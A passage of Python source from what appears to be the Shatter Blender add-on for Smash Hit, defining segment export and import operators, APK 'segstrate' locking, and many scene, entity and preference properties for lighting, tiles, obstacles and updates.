export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export_test_server\"\n\tbl_label = \"Export segment to test server\"\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tNone,\n\t\t\tcontext,\n\t\t\tparams = {\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t\t\"sh_test_server\": True,\n\t\t\t\t\"sh_meshbake_template\": segment_export.tryTemplatesPath()\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export_test(self, context):\n\tself.layout.operator(\"shatter.export_test_server\", text=\"Shatter: Quick Test Server\")\n\nclass sh_export_binary(sh_ExportCommon):\n\t\"\"\"\n\tBinary segment export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export_bin\"\n\tbl_label = \"Export Binary Segment\"\n\t\n\tfilename_ext = \".bin\"\n\tfilter_glob = bpy.props.StringProperty(default='*.bin', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tself.filepath,\n\t\t\tcontext,\n\t\t\tparams = {\n\t\t\t\t\"sh_meshbake_template\": self.sh_meshbake_template,\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t\t\"binary\": True,\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export_binary(self, context):\n\tself.layout.operator(\"shatter.export_bin\", text=\"Binary Segment (.bin)\")\n\n# UI-related\n\nclass sh_import(bpy.types.Operator, ImportHelper):\n\t\"\"\"\n\tImport for uncompressed segments\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.import\"\n\tbl_label = \"Import Segment\"\n\t\n\tcheck_extension = False\n\tfilename_ext = \".xml.mp3\"\n\tfilter_glob = bpy.props.StringProperty(default='*.xml.mp3', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\treturn segment_import.sh_import_segment(self.filepath, context)\n\ndef sh_draw_import(self, context):\n\tself.layout.operator(\"shatter.import\", text=\"Segment (.xml.mp3)\")\n\nclass sh_import_gz(bpy.types.Operator, ImportHelper):\n\t\"\"\"\n\tImport for compressed segments\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.import_gz\"\n\tbl_label = \"Import Compressed Segment\"\n\t\n\tcheck_extension = False\n\tfilename_ext = \".xml.gz.mp3\"\n\tfilter_glob = bpy.props.StringProperty(default='*.xml.gz.mp3', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\treturn segment_import.sh_import_segment(self.filepath, context, True)\n\ndef sh_draw_import_gz(self, context):\n\tself.layout.operator(\"shatter.import_gz\", text=\"Compressed Segment (.xml.gz.mp3)\")\n\nclass sh_shl_login(bpy.types.Operator):\n\t\"\"\"\n\tLog in to the online service\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.shl_login\"\n\tbl_label = \"Log in to Shatter Online Service\"\n\t\n\tdef execute(self, context):\n\t\treturn {\"FINISHED\"}\n\nclass sh_auto_setup_segstrate(bpy.types.Operator):\n\t\"\"\"\n\tSet up segstrate segment protection\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.segstrate_auto\"\n\tbl_label = \"One-click setup 
segstrate protection\"\n\t\n\tdef execute(self, context):\n\t\tcontext.window.cursor_set('WAIT')\n\t\t\n\t\tapk_path = butil.find_apk(no_override = True)\n\t\t\n\t\tif (not apk_path):\n\t\t\traise butil.show_message(\"Segstrate error\", \"Could not find an APK path to use for segstrate. Please open an APK in APK Editor Studio. Note: To prevent accidently corrupting files, using an overridden assets directory is not allowed.\")\n\t\t\treturn {\"FINISHED\"}\n\t\t\n\t\tsegstrate.setup_apk(util.absolute_path(f\"{apk_path}/../\"))\n\t\t\n\t\tcontext.window.cursor_set('DEFAULT')\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_static_segstrate(bpy.types.Operator, ImportHelper):\n\t\"\"\"\n\tSegstrate locking for when you have an APK you want to lock\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.segstrate_static\"\n\tbl_label = \"Permanently lock APK with Segstrate\"\n\t\n\tagreement: BoolProperty(\n\t\tname = \"I understand the conseqences of locking my APK permantently.\",\n\t\tdescription = \"Locking your APK will make you unable to import or export any segments to the APK. Please only use this when you are making a copy of the APK that you want to distribute.\",\n\t\tdefault = False,\n\t)\n\t\n\tdef execute(self, context):\n\t\tif (self.agreement):\n\t\t\tcontext.window.cursor_set('WAIT')\n\t\t\tsegstrate.setup_apk(self.filepath, False)\n\t\t\tcontext.window.cursor_set('DEFAULT')\n\t\telse:\n\t\t\tbutil.show_message(\"Segstrate error\", \"The agreement has not been accepted and the protection has not been preformed.\")\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_rebake_meshes(bpy.types.Operator, ImportHelper):\n\t\"\"\"\n\tRebake many meshes from a folder\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.rebake_meshes\"\n\tbl_label = \"Rebake multipule meshes\"\n\t\n\tdef execute(self, context):\n\t\tassets = butil.find_apk()\n\t\t\n\t\tcontext.window.cursor_set('WAIT')\n\t\textra_tools.rebake_all(self.filepath, f\"{assets}/templates.xml.mp3\" if assets else None)\n\t\tcontext.window.cursor_set('DEFAULT')\n\t\t\n\t\treturn {\"FINISHED\"}\n\n## EDITOR\n## The following things are more related to the editor and are not specifically\n## for exporting or importing segments.\n\nclass sh_SceneProperties(PropertyGroup):\n\t\"\"\"\n\tSegment (scene) properties\n\t\"\"\"\n\t\n\tsh_level: StringProperty(\n\t\tname = \"Level\",\n\t\tdescription = \"The name of the checkpoint that this segment belongs to.\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_room: StringProperty(\n\t\tname = \"Room\",\n\t\tdescription = \"The name of the room that this segment belongs to.\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_segment: StringProperty(\n\t\tname = \"Segment\",\n\t\tdescription = \"The name of this segment\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_len: FloatVectorProperty(\n\t\tname = \"Size\",\n\t\tdescription = \"Segment size (Width, Height, Depth). Hint: Last paramater changes the length (depth) of the segment\",\n\t\tsubtype = \"XYZ\",\n\t\tdefault = (12.0, 10.0, 8.0), \n\t\tmin = 0.0,\n\t\tmax = 1024.0,\n\t)\n\t\n\tsh_auto_length: BoolProperty(\n\t\tname = \"Auto length\",\n\t\tdescription = \"Automatically determine the length of the segment based on the furthest object from the origin.\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_box_bake_mode: EnumProperty(\n\t\tname = \"Box bake mode\",\n\t\tdescription = \"This will control how the boxes should be exported. 
Hover over each option for an explation of how it works\",\n\t\titems = [\n\t\t\t('Mesh', \"Mesh\", \"Exports a .mesh file alongside the segment for showing visible box geometry\"),\n\t\t\t('StoneHack', \"Obstacle\", \"Adds a custom obstacle named 'stone' for every box that attempts to simulate stone. Only colour is supported: there are no textures\"),\n\t\t\t('None', \"None\", \"Don't do anything related to baking stone; only exports the raw segment data\"),\n\t\t],\n\t\tdefault = \"Mesh\"\n\t)\n\t\n\tsh_template: StringProperty(\n\t\tname = \"Template\",\n\t\tdescription = \"The template paramater that is passed for the entire segment\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_default_template: StringProperty(\n\t\tname = \"Default template\",\n\t\tdescription = \"The base name of the template to use when no template is specified for an entity. Format: boxes 🡒 '{basename}', obstacles 🡒 '{basename}_glass', obstacles starting with 'score' 🡒 '{basename}_st', segment 🡒 '{basename}_s'\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_softshadow: FloatProperty(\n\t\tname = \"Soft shadow\",\n\t\tdescription = \"Opacity of soft shadow on dynamic objects\",\n\t\tdefault = 0.6,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_vrmultiply: FloatProperty(\n\t\tname = \"Segment strech\",\n\t\tdescription = \"This option tries to strech the segment's depth to make more time between obstacles. The intent is to allow it to be played in Smash Hit VR easier and without modifications to the segment\",\n\t\tdefault = 1.0,\n\t\tmin = 0.75,\n\t\tmax = 4.0,\n\t)\n\t\n\tsh_light_left: FloatProperty(\n\t\tname = \"Left\",\n\t\tdescription = \"Light going on to the left side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_right: FloatProperty(\n\t\tname = \"Right\",\n\t\tdescription = \"Light going on to the right side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_top: FloatProperty(\n\t\tname = \"Top\",\n\t\tdescription = \"Light going on to the top side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_bottom: FloatProperty(\n\t\tname = \"Bottom\",\n\t\tdescription = \"Light going on to the bottom side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_front: FloatProperty(\n\t\tname = \"Front\",\n\t\tdescription = \"Light going on to the front side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_back: FloatProperty(\n\t\tname = \"Back\",\n\t\tdescription = \"Light going on to the back side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_menu_segment: BoolProperty(\n\t\tname = \"Menu segment mode\",\n\t\tdescription = \"Treats the segment like it will appear on the main menu. Bakes faces that cannot be seen by the player\",\n\t\tdefault = False\n\t)\n\t\n\tsh_ambient_occlusion: BoolProperty(\n\t\tname = \"Ambient occlusion\",\n\t\tdescription = \"Enables ambient occlusion (per-vertex lighting)\",\n\t\tdefault = True\n\t)\n\t\n\tsh_lighting: BoolProperty(\n\t\tname = \"Lighting\",\n\t\tdescription = \"Enables some lighting features when baking the mesh\",\n\t\tdefault = False\n\t)\n\t\n\tsh_drm_disallow_import: BoolProperty(\n\t\tname = \"Disallow import\",\n\t\tdescription = \"This will disallow importing the exported segment. It can very easily be bypassed, but might prevent a casual user from editing your segment without asking. 
Please use this feature wisely and consider providing Blender files for people who ask nicely\",\n\t\tdefault = False\n\t)\n\t\n\tsh_lighting_ambient: FloatVectorProperty(\n\t\tname = \"Ambient\",\n\t\tdescription = \"Colour and intensity of the ambient light\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (0.0, 0.0, 0.0), \n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_stone_obstacle_name: StringProperty(\n\t\tname = \"Stone obstacle name\",\n\t\tdescription = \"Name of the obstacle to use for stone\",\n\t\tdefault = \"stone\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_legacy_colour_model: BoolProperty(\n\t\tname = \"Legacy colour model\",\n\t\tdescription = \"Uses the colour inheritance model from SHBT v0.9x, which can avoid extra effort when using the stone hack\",\n\t\tdefault = False\n\t)\n\t\n\tsh_legacy_colour_default: FloatVectorProperty(\n\t\tname = \"Default colour\",\n\t\tdescription = \"The default colour for all (non-visible marked) boxes when using the legacy colour model\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0), \n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_fog_colour_top: FloatVectorProperty(\n\t\tname = \"Top fog\",\n\t\tdescription = \"Fog colour for quick test. While this does use the fogcolor xml attribute, this property cannot be inherited from templates or used like a normal property\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0), \n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_fog_colour_bottom: FloatVectorProperty(\n\t\tname = \"Bottom fog\",\n\t\tdescription = \"Fog colour for quick test. While this does use the fogcolor xml attribute, this property cannot be inherited from templates or used like a normal property\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (0.0, 0.0, 0.0),\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_music: StringProperty(\n\t\tname = \"Music track\",\n\t\tdescription = \"Name of the music file to play in quick test. The track must be in the apk. Default is to choose a random track\",\n\t\tdefault = \"\",\n\t)\n\t\n\tsh_reverb: StringProperty(\n\t\tname = \"Reverb\",\n\t\tdescription = \"Reverb parameters in quick test. No one knows what these do ‾\\\\_o_/‾\",\n\t\tdefault = \"\",\n\t)\n\t\n\tsh_echo: StringProperty(\n\t\tname = \"Echo\",\n\t\tdescription = \"Echo parameters in quick test. No one knows what these do ‾\\\\_o_/‾\",\n\t\tdefault = \"\",\n\t)\n\t\n\tsh_particles: EnumProperty(\n\t\tname = \"Particles\",\n\t\tdescription = \"The particles that appear when looking at the stage in quick test\",\n\t\titems = (\n\t\t\t(\"None\", \"None\", \"\"),\n\t\t\t(\"starfield\", \"Star field\", \"\"),\n\t\t\t(\"lowrising\", \"Low rising 1\", \"\"),\n\t\t\t(\"lowrising2\", \"Low rising 2\", \"\"),\n\t\t\t(\"sidesrising\", \"Sides rising\", \"\"),\n\t\t\t(\"fallinglite\", \"Falling lite\", \"\"),\n\t\t\t(\"bubbles\", \"Bubbles\", \"\"),\n\t\t\t(\"dustyfalling\", \"Dusty falling\", \"\"),\n\t\t),\n\t\tdefault = \"None\",\n\t)\n\t\n\tsh_difficulty: FloatProperty(\n\t\tname = \"Difficulty\",\n\t\tdescription = \"Sets the difficulty level of the room\",\n\t\tdefault = 0.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_gravity: FloatProperty(\n\t\tname = \"Gravity\",\n\t\tdescription = \"The amount of gravity to use in quick test\",\n\t\tdefault = 1.0,\n\t\tmin = -1.0,\n\t\tmax = 3.0,\n\t)\n\t\n\tsh_extra_code: StringProperty(\n\t\tname = \"Extra code\",\n\t\tdescription = \"Extra code to include in the room file. 
Multiple statements can be separated by ';'.\",\n\t\tdefault = \"\",\n\t)\n\t\n\tsh_room_length: IntProperty(\n\t\tname = \"Room length\",\n\t\tdescription = \"The length of the room in quick test\",\n\t\tdefault = 90,\n\t\tmin = 50,\n\t\tmax = 250,\n\t)\n\n# Object (box/obstacle/powerup/decal/water) properties\n\nclass sh_EntityProperties(PropertyGroup):\n\t\n\tsh_type: EnumProperty(\n\t\tname = \"Kind\",\n\t\tdescription = \"The kind of object that the currently selected object should be treated as.\",\n\t\titems = [\n\t\t\t('BOX', \"Box\", \"\", \"MESH_CUBE\", 0),\n\t\t\t('OBS', \"Obstacle\", \"\", \"NODE_MATERIAL\", 1),\n\t\t\t('DEC', \"Decal\", \"\", \"TEXTURE\", 2),\n\t\t\t('POW', \"Power-up\", \"\", \"LIGHT_SUN\", 3),\n\t\t\t('WAT', \"Water\", \"\", \"MATFLUID\", 4),\n\t\t],\n\t\tdefault = \"BOX\"\n\t)\n\t\n\tsh_template: StringProperty(\n\t\tname = \"Template\",\n\t\tdescription = \"The template for the obstacle/box (see templates.xml), remember that this can be easily overridden per obstacle/box\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_use_chooser: BoolProperty(\n\t\tname = \"Use obstacle chooser\",\n\t\tdescription = \"Use the obstacle chooser instead of typing the name by hand\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_obstacle: StringProperty(\n\t\tname = \"Obstacle\",\n\t\tdescription = \"Type of obstacle to be used (as a file name string)\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_obstacle_chooser: EnumProperty(\n\t\tname = \"Obstacle\",\n\t\tdescription = \"Type of obstacle to be used (pick a name)\",\n\t\titems = obstacle_db.OBSTACLES,\n\t\tdefault = \"scoretop\",\n\t)\n\t\n\tsh_powerup: EnumProperty(\n\t\tname = \"Power-up\",\n\t\tdescription = \"The type of power-up that will appear\",\n\t\titems = [\n\t\t\t('ballfrenzy', \"Ball Frenzy\", \"Allows the player infinite balls for some time\", \"LIGHTPROBE_GRID\", 0),\n\t\t\t('slowmotion', \"Slow Motion\", \"Slows down the game\", \"MOD_TIME\", 1),\n\t\t\t('nitroballs', \"Nitro Balls\", \"Turns balls into explosives for a short period of time\", \"PROP_OFF\", 2),\n\t\t\tNone,\n\t\t\t('barrel', \"Barrel\", \"Creates a large explosion which breaks glass (leftover from beta versions)\", \"EXPERIMENTAL\", 3),\n\t\t\tNone,\n\t\t\t('multiball', \"Multi-ball*\", \"*Does not work anymore. Old power up that would enable five-ball multiball\"),\n\t\t\t('freebie', \"Freebie*\", \"*Does not work anymore. Old power up found in binary strings but no known usage\"),\n\t\t\t('antigravity', \"Anti-gravity*\", \"*Does not work anymore. Old power up that probably would have reversed gravity\"),\n\t\t\t('rewind', \"Rewind*\", \"*Does not work anymore. Old power up that probably would have reversed time\"),\n\t\t\t('sheild', \"Shield*\", \"*Does not work anymore. Old power up that probably would have protected the player\"),\n\t\t\t('homing', \"Homing*\", \"*Does not work anymore. Old power up that probably would have homed to obstacles\"),\n\t\t\t('life', \"Life*\", \"*Does not work anymore. Old power up that gave the player a life\"),\n\t\t\t('balls', \"Balls*\", \"*Does not work anymore. Old power up that gave the player ten balls\"),\n\t\t],\n\t\tdefault = \"ballfrenzy\",\n\t)\n\t\n\tsh_export: BoolProperty(\n\t\tname = \"Export object\",\n\t\tdescription = \"If the object should be exported to the XML at all. 
Change \\\"hidden\\\" if you'd like it to be hidden but still present in the exported file\",\n\t\tdefault = True,\n\t)\n\t\n\tsh_hidden: BoolProperty(\n\t\tname = \"Hidden\",\n\t\tdescription = \"Controls if the entity will show in the official level editor. This is basically useless but included for completeness\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_mode: EnumProperty(\n\t\tname = \"Mode\",\n\t\toptions = {\"ENUM_FLAG\"},\n\t\tdescription = \"The game modes in which this obstacle should appear\",\n\t\titems = [\n\t\t\t('training', \"Training\", \"Obstacle should appear in Training mode\", 1),\n\t\t\t('classic', \"Classic and Zen\", \"Obstacle should appear in Classic and Zen modes\", 2),\n\t\t\t('expert', \"Mayhem\", \"Obstacle should appear in Mayhem mode\", 4),\n\t\t\t('versus', \"Versus\", \"Obstacle should appear in Versus mode\", 16),\n\t\t\t('coop', \"Co-op\", \"Obstacle should appear in Co-op mode\", 32),\n\t\t],\n\t\tdefault = {'training', 'classic', 'expert', 'versus', 'coop'},\n\t)\n\t\n\tsh_difficulty: FloatVectorProperty(\n\t\tname = \"Difficulty\",\n\t\tdescription = \"The range of difficulty values for which this entity will appear. Difficulty is different than game modes, and is mainly used in Endless Mode to include or exclude obstacle based on a value set per room (using mgSetDifficulty) indicating how hard the room should be. As an example, this is used to exclude crystals in later levels in the Endless mode without creating entirely new segments\",\n\t\tdefault = (0.0, 1.0),\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t\tsize = 2,\n\t)\n\t\n\t##################\n\t# Mesh properties\n\t##################\n\t\n\tsh_visible: BoolProperty(\n\t\tname = \"Visible\",\n\t\tdescription = \"If the box will appear in the exported mesh\",\n\t\tdefault = True\n\t)\n\t\n\tsh_use_multitile: BoolProperty(\n\t\tname = \"Tile per-side\",\n\t\tdescription = \"Specifiy a colour for each parallel pair of faces on the box\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_tile: IntProperty(\n\t\tname = \"Tile\",\n\t\tdescription = \"The texture that will appear on the surface of the box or decal\",\n\t\tdefault = 0,\n\t\tmin = 0,\n\t\tmax = 63\n\t)\n\t\n\tsh_tile1: IntProperty(\n\t\tname = \"Right Left\",\n\t\tdescription = \"The texture that will appear on the surface of the box or decal\",\n\t\tdefault = 0,\n\t\tmin = 0,\n\t\tmax = 63\n\t)\n\t\n\tsh_tile2: IntProperty(\n\t\tname = \"Top Bottom\",\n\t\tdescription = \"The texture that will appear on the surface of the box or decal\",\n\t\tdefault = 0,\n\t\tmin = 0,\n\t\tmax = 63\n\t)\n\t\n\tsh_tile3: IntProperty(\n\t\tname = \"Front Back\",\n\t\tdescription = \"The texture that will appear on the surface of the box or decal\",\n\t\tdefault = 0,\n\t\tmin = 0,\n\t\tmax = 63\n\t)\n\t\n\tsh_tilerot: IntVectorProperty(\n\t\tname = \"Tile orientation\",\n\t\tdescription = \"Orientation of the tile, where 0 is facing up\",\n\t\tdefault = (0, 0, 0), \n\t\tmin = 0,\n\t\tmax = 3,\n\t) \n\t\n\tsh_tilesize: FloatVectorProperty(\n\t\tname = \"Tile size\",\n\t\tdescription = \"The appearing size of the tiles on the box when exported. 
In RightLeft, TopBottom, FrontBack\",\n\t\tdefault = (1.0, 1.0, 1.0), \n\t\tmin = 0.0,\n\t\tmax = 128.0,\n\t\tsize = 3\n\t) \n\t\n\t########################\n\t# Back to normal things\n\t########################\n\t\n\tsh_decal: IntProperty(\n\t\tname = \"Decal\",\n\t\tdescription = \"The image ID for the decal (negative numbers are doors)\",\n\t\tdefault = 1,\n\t\tmin = -4,\n\t\tmax = 63\n\t)\n\t\n\tsh_reflective: BoolProperty(\n\t\tname = \"Reflective\",\n\t\tdescription = \"If this box should show reflections\",\n\t\tdefault = False\n\t)\n\t\n\t#############\n\t# Parameters\n\t#############\n\t\n\tsh_param0: StringProperty(\n\t\tname = \"param0\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param1: StringProperty(\n\t\tname = \"param1\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param2: StringProperty(\n\t\tname = \"param2\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param3: StringProperty(\n\t\tname = \"param3\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param4: StringProperty(\n\t\tname = \"param4\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param5: StringProperty(\n\t\tname = \"param5\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param6: StringProperty(\n\t\tname = \"param6\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param7: StringProperty(\n\t\tname = \"param7\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param8: StringProperty(\n\t\tname = \"param8\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param9: StringProperty(\n\t\tname = \"param9\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param10: StringProperty(\n\t\tname = \"param10\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param11: StringProperty(\n\t\tname = \"param11\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\t###############\n\t# Other values\n\t###############\n\t\n\tsh_havetint: BoolProperty(\n\t\tname = \"Decal colourisation\",\n\t\tdescription = \"Changes the tint (colourisation) of the decal\",\n\t\tdefault = False\n\t)\n\t\n\tsh_use_multitint: BoolProperty(\n\t\tname = \"Colour per-side\",\n\t\tdescription = \"Specify a colour for each parallel pair of faces on the box\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_tint: FloatVectorProperty(\n\t\tname = \"Colour\",\n\t\tdescription = \"The colour to be used for tinting, colouring and mesh data\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0, 1.0), \n\t\tsize = 
4,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_tint1: FloatVectorProperty(\n\t\tname = \"Right Left\",\n\t\tdescription = \"The colour to be used for tinting, colouring and mesh data\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0, 1.0), \n\t\tsize = 4,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_tint2: FloatVectorProperty(\n\t\tname = \"Top Bottom\",\n\t\tdescription = \"The colour to be used for tinting, colouring and mesh data\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0, 1.0), \n\t\tsize = 4,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_tint3: FloatVectorProperty(\n\t\tname = \"Front Back\",\n\t\tdescription = \"The colour to be used for tinting, colouring and mesh data\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0, 1.0), \n\t\tsize = 4,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_blend: FloatProperty(\n\t\tname = \"Blend mode\",\n\t\tdescription = \"How the colour of the decal and the existing colour will be blended. 1 = normal, 0 = additive, or any value in between\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_size: FloatVectorProperty(\n\t\tname = \"Size\",\n\t\tdescription = \"The size of the object when exported\",\n\t\tdefault = (1.0, 1.0), \n\t\tmin = 0.0,\n\t\tmax = 256.0,\n\t\tsize = 2,\n\t)\n\t\n\tsh_glow: FloatProperty(\n\t\tname = \"Glow\",\n\t\tdescription = \"The intensity of the light in \\\"watts\\\"; zero if this isn't a light\",\n\t\tdefault = 0.0,\n\t\tmin = 0.0,\n\t\tmax = 1000.0,\n\t)\n\nclass sh_AddonPreferences(AddonPreferences):\n\tbl_idname = \"shatter\"\n\t\n\t## General ##\n\tdefault_assets_path: StringProperty(\n\t\tname = \"Default assets path\",\n\t\tdescription = \"The path to your Smash Hit assets folder, if you want to override the default automatic APK finding\",\n\t\tsubtype = \"DIR_PATH\",\n\t\tdefault = \"\",\n\t)\n\t\n\tenable_segment_warnings: BoolProperty(\n\t\tname = \"Enable export and import warnings\",\n\t\tdescription = \"Export and import warnings can warn you about possible issues that might result in odd or unexpected behaviour in Smash Hit\",\n\t\tdefault = True,\n\t)\n\t\n\tresolve_templates: BoolProperty(\n\t\tname = \"Resolve templates at export time\",\n\t\tdescription = \"Solves templates when a segment is exported. This avoids the need for adding used templates to templates.xml, but makes the filesize larger and the XML file less readable\",\n\t\tdefault = False,\n\t)\n\t\n\tcompact_ui: BoolProperty(\n\t\tname = \"Compact UI mode\",\n\t\tdescription = \"Avoids drawing any excessive UI elements that would make the UI larger than needed\",\n\t\tdefault = False,\n\t)\n\t\n\t## Network ##\n\tenable_update_notifier: BoolProperty(\n\t\tname = \"Enable update checking\",\n\t\tdescription = \"Enables checking for updates. This will try to contact github, which may pose a privacy risk\",\n\t\tdefault = True,\n\t)\n\t\n\tenable_auto_update: BoolProperty(\n\t\tname = \"Enable automatic updates\",\n\t\tdescription = \"Automatically downloads and installs the newest version of the addon\",\n\t\tdefault = True,\n\t)\n\t\n\tupdater_channel: EnumProperty(\n\t\tname = \"Update frequency\",\n\t\tdescription = \"This controls how frequently you will receive updates, tweaks and new features. 
Faster updates might be buggier and break your workflow but contain better features, while slower updates will give a better experience without newer features\",\n\t\titems = [\n\t\t\t('stable', \"Fast\", \"Contains new updates and features as soon as they are available, but might also break sometimes.\"),\n\t\t\t('updatertest', \"Updater test\", \"A testing channel. This doesn't get real updates.\"),\n\t\t],\n\t\tdefault = \"stable\",\n\t)\n\t\n\tenable_quick_test_server: BoolProperty(\n\t\tname = \"Enable quick test server\",\n\t\tdescription = \"Enables the quick test server. This will create a local http server using python, which might pose a security risk\",\n\t\tdefault = True,\n\t)\n\t\n\tenable_bad_check: BoolProperty(\n\t\tname = \"Other network features\",\n\t\tdescription = \"Enables other network features. Some features might not be available if you don't enable this\",\n\t\tdefault = True,\n\t)\n\t\n\t## Protection options 